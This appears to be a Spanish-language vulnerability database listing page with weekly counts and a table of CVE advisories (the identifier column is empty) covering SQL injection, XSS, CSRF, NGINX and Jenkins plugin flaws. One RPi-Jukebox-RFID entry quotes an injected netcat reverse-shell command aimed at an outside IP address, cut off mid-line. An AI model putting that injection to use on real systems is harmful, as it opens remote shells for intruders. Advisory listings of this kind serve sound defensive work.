Vulnerabilidades
Resumen — últimos 7 días
Vulnerabilidades nuevas2847▼ 221 respecto a la semana anterior
Críticas / altas1332▼ 166 respecto a la semana anterior
Nueva explotación activa (KEV)6▼ 1 respecto a la semana anterior
Sin puntuar (sin CVSS)214▼ 107 respecto a la semana anterior
1674 resultados, ordenados por fecha de publicación (más recientes primero)
| CVE | Estado | Severidad | EPSS | Explotación activa | Tecnologías afectadas | Publicada ▼ | Modificada | Descripción |
|---|---|---|---|---|---|---|---|---|
| Analizada | Crítica (9.8) | 0.96% | — | Nelzkie15 Human Resource Information System | 6/4/2024 | 17/6/2026 | Una vulnerabilidad ha sido encontrada en SourceCodester Human Resource Information System 1.0 y clasificada como crítica. Esta vulnerabilidad afecta a un código desconocido del archivo inicialize/login_process.php. La manipulación del argumento hr_email/hr_password conduce a la inyección de SQL. El ataque se puede… | |
| Aplazada | Crítica (9.8) | 0.52% | — | Open Source Medicine Medicine Ordering SystemAI | 19/3/2024 | 17/6/2026 | Se descubrió que Open Source Medicine Ordering System v1.0 contiene una vulnerabilidad de inyección SQL a través del parámetro de fecha en /admin/reports/index.php. | |
| Modificada | Media (6.1) | 0.60% | — | Tms-outsource Wpdatatables | 13/3/2024 | 17/6/2026 | El complemento wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin para WordPress es vulnerable a Cross-Site Scripting Reflejado a través del parámetro 'A' en todas las versiones hasta la 3.4.2.2 incluida debido a una sanitización de entrada insuficiente y un escape de salida. Esto hace… | |
| Analizada | Media (6.3) | 0.56% | — | Jenkins Bitbucket Branch Source | 6/3/2024 | 17/6/2026 | En el complemento Jenkins Bitbucket Branch Source 866.vdea_7dcd3008e y versiones anteriores, excepto 848.850.v6a_a_2a_234a_c81, al descubrir solicitudes de extracción de bifurcaciones, la política de confianza "Bifurcaciones en la misma cuenta" permite cambios en los archivos Jenkins de usuarios sin acceso de… | |
| Analizada | Crítica (9.8) | 0.63% | — | Mayurik Free AND Open Source Inventory Management System | 27/2/2024 | 17/6/2026 | Se encontró una vulnerabilidad en SourceCodester Free and Open Source Inventory Management System 1.0. Ha sido calificada como crítica. Este problema afecta un procesamiento desconocido del archivo /app/ajax/search_sales_report.php. La manipulación del argumento cliente conduce a la inyección SQL. El ataque puede… | |
| Modificada | Alta (7.5) | 0.91% | — | F5 Nginx Open SourceF5 Nginx Plus | 14/2/2024 | 17/6/2026 | Cuando NGINX Plus o NGINX OSS están configurados para usar el módulo HTTP/3 QUIC, las solicitudes no divulgadas pueden hacer que los procesos de trabajo de NGINX finalicen. Nota: El módulo HTTP/3 QUIC no está habilitado de forma predeterminada y se considera experimental. Para obtener más información, consulte… | |
| Modificada | Alta (7.5) | 1.1% | — | F5 Nginx Open SourceF5 Nginx Plus | 14/2/2024 | 17/6/2026 | Cuando NGINX Plus o NGINX OSS están configurados para usar el módulo HTTP/3 QUIC, las solicitudes no divulgadas pueden hacer que los procesos de trabajo de NGINX finalicen. Nota: El módulo HTTP/3 QUIC no está habilitado de forma predeterminada y se considera experimental. Para obtener más información, consulte… | |
| Analizada | Alta (8) | 0.77% | — | Grafana Json API Data Source | 14/2/2024 | 17/6/2026 | El complemento de fuente de datos JSON (https://grafana.com/grafana/plugins/marcusolsson-json-datasource/ https://grafana.com/grafana/plugins/marcusolsson-json-datasource/) es un complemento mantenido por Grafana Labs para Grafana que permite recuperar y procesar datos JSON desde un endpoint remoto (incluida una… | |
| Modificada | Media (5.4) | 0.52% | — | Tms-outsource Amelia | 5/2/2024 | 17/6/2026 | El complemento Booking for Appointments and Events Calendar – Amelia para WordPress es vulnerable a Cross-Site Scripting Almacenado a través de los códigos cortos del complemento en todas las versiones hasta la 1.0.93 incluida, debido a una sanitización de entrada insuficiente y a un escape de salida en los atributos… | |
| Modificada | Media (6.1) | 0.48% | 💥 PoC | Remyandrade Travel Journal Using PHP AND Mysql With Source Code | 1/2/2024 | 17/6/2026 | Una vulnerabilidad de cross site scripting (XSS) almacenado en Travel Journal usando PHP y MySQL con código fuente v1.0 permite a los atacantes ejecutar scripts web arbitrarios o HTML a través de un payload manipulado inyectado en el parámetro Share Your Moments en /travel-journal/write -journal.php. | |
| Modificada | Media (6.1) | 0.46% | — | Remyandrade Travel Journal Using PHP AND Mysql With Source Code | 1/2/2024 | 17/6/2026 | Una vulnerabilidad de cross site scripting (XSS) almacenado en Travel Journal usando PHP y MySQL con código fuente v1.0 permite a los atacantes ejecutar scripts web arbitrarios o HTML a través de un payload manipulado inyectado en el parámetro de ubicación en /travel-journal/write-journal .php. | |
| Modificada | Crítica (9.8) | 1.6% | 💥 PoC | Angusj Resource Hacker | 31/1/2024 | 17/6/2026 | Vulnerabilidad de desbordamiento de búfer en la región Heap de la memoria en Resource Hacker, desarrollada por Angus Johnson, que afecta a la versión 3.6.0.92. Esta vulnerabilidad podría permitir a un atacante ejecutar código arbitrario mediante un argumento de nombre de archivo largo. | |
| Modificada | Media (6.5) | 0.35% | — | Free AND Open Source Inventory Management System Project Free AND Open Source Inventory Management System | 30/1/2024 | 17/6/2026 | Vulnerabilidad de Cross Site Request Forgery (CSRF) en Free Open-Source Inventory Management System v.1.0 permite a un atacante remoto ejecutar código arbitrario a través del parámetro staff_list en el componente index.php. | |
| Modificada | Alta (7.5) | 0.48% | — | Imagesourcecontrol Image Source Control | 27/1/2024 | 17/6/2026 | Vulnerabilidad de exposición de información confidencial a un actor no autorizado en Thomas Maier Image Source Control Lite – Show Image Credits and Captions. Este problema afecta a Image Source Control Lite – Show Image Credits and Captions: desde n/a hasta 2.17.0. | |
| Modificada | Media (5.3) | 0.50% | — | Jenkins Github Branch Source | 24/1/2024 | 17/6/2026 | El complemento Jenkins GitLab Branch Source 684.vea_fa_7c1e2fe3 y versiones anteriores utiliza una función de comparación de tiempo no constante al verificar si el token de webhook proporcionado y el esperado son iguales, lo que potencialmente permite a los atacantes usar métodos estadísticos para obtener un token de… | |
| Modificada | Media (4.3) | 0.32% | — | Jenkins Github Branch Source | 24/1/2024 | 17/6/2026 | Una vulnerabilidad de cross-site request forgery (CSRF) en el complemento Jenkins GitLab Branch Source 684.vea_fa_7c1e2fe3 y versiones anteriores permite a los atacantes conectarse a una URL especificada por el atacante. | |
| Modificada | Media (6.5) | 0.46% | — | Jenkins Github Branch Source | 24/1/2024 | 17/6/2026 | El complemento Jenkins GitLab Branch Source 684.vea_fa_7c1e2fe3 y anteriores descubre incondicionalmente proyectos que se comparten con el grupo propietario configurado, lo que permite a los atacantes configurar y compartir un proyecto, lo que da como resultado que Jenkins cree una canalización manipulada durante el… | |
| Modificada | Crítica (9.8) | 1.6% | — | Sourcefabric Phoniebox | 19/1/2024 | 17/6/2026 | Se encontró una vulnerabilidad en MiczFlor RPi-Jukebox-RFID hasta 2.5.0. Ha sido calificada como crítica. Una función desconocida del archivo userScripts.php del componente HTTP Request Handler es afectada por esta vulnerabilidad. La manipulación de la carpeta de argumentos con la entrada ;nc 104.236.1.147 4444 -e… | |
| Modificada | Alta (7.8) | 0.39% | — | Atlassian Sourcetree | 16/1/2024 | 17/6/2026 | Esta vulnerabilidad de ejecución remota de código (RCE) de alta gravedad se introdujo en la versión 3.4.14 de Sourcetree para Mac y Sourcetree para Windows. Esta vulnerabilidad de ejecución remota de código (RCE), con una puntuación CVSS de 7,8 y un vector CVSS de: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, permite… | |
| Modificada | Crítica (9.8) | 0.50% | — | Code-projects Human Resource Integrated System | 12/1/2024 | 17/6/2026 | Se encontró una vulnerabilidad en code-projects Human Resource Integrated System 1.0. Ha sido declarada crítica. Esta vulnerabilidad afecta al código desconocido del archivo /admin_route/dec_service_credits.php. La manipulación del argumento date conduce a la inyección de SQL. El ataque se puede iniciar de forma… | |
| Modificada | Crítica (9.8) | 0.50% | — | Code-projects Human Resource Integrated System | 12/1/2024 | 17/6/2026 | Se encontró una vulnerabilidad en code-projects Human Resource Integrated System 1.0. Ha sido clasificada como crítica. Esto afecta a una parte desconocida del archivo /admin_route/inc_service_credits.php. La manipulación del argumento id conduce a la inyección de SQL. Es posible iniciar el ataque de forma remota. La… | |
| Modificada | Crítica (9.8) | 0.50% | — | Code-projects Human Resource Integrated System | 12/1/2024 | 17/6/2026 | Una vulnerabilidad fue encontrada en code-projects Human Resource Integrated System 1.0 y clasificada como crítica. Una función desconocida del archivo update_personal_info.php es afectada por esta vulnerabilidad. La manipulación del argumento sex conduce a la inyección SQL. El ataque puede lanzarse de forma remota.… | |
| Modificada | Crítica (9.8) | 0.94% | — | Fhs-opensource Iparking | 8/1/2024 | 17/6/2026 | Una vulnerabilidad fue encontrada en fhs-opensource iparking 1.5.22.RELEASE y clasificada como crítica. Este problema afecta algún procesamiento desconocido del archivo /vueLogin. La manipulación conduce a la deserialización. El ataque puede iniciarse de forma remota. La explotación ha sido divulgada al público y… | |
| Modificada | Crítica (9.8) | 0.71% | — | Fhs-opensource Iparking | 8/1/2024 | 17/6/2026 | Una vulnerabilidad fue encontrada en fhs-opensource iparking 1.5.22.RELEASE y clasificada como crítica. Esta vulnerabilidad afecta a la función getData del archivo src/main/java/com/xhb/pay/action/PayTempOrderAction.java. La manipulación conduce a la inyección de SQL. El ataque se puede iniciar de forma remota. La… | |
| Modificada | Crítica (9.8) | 0.66% | — | Mayurik Free AND Open Source Inventory Management System | 29/12/2023 | 17/6/2026 | Una vulnerabilidad fue encontrada en SourceCodester Free and Open Source Inventory Management System 1.0 y clasificada como crítica. Este problema afecta un procesamiento desconocido del archivo /app/ajax/sell_return_data.php. La manipulación del argumento columns[0][data] conduce a la inyección de SQL. El ataque… |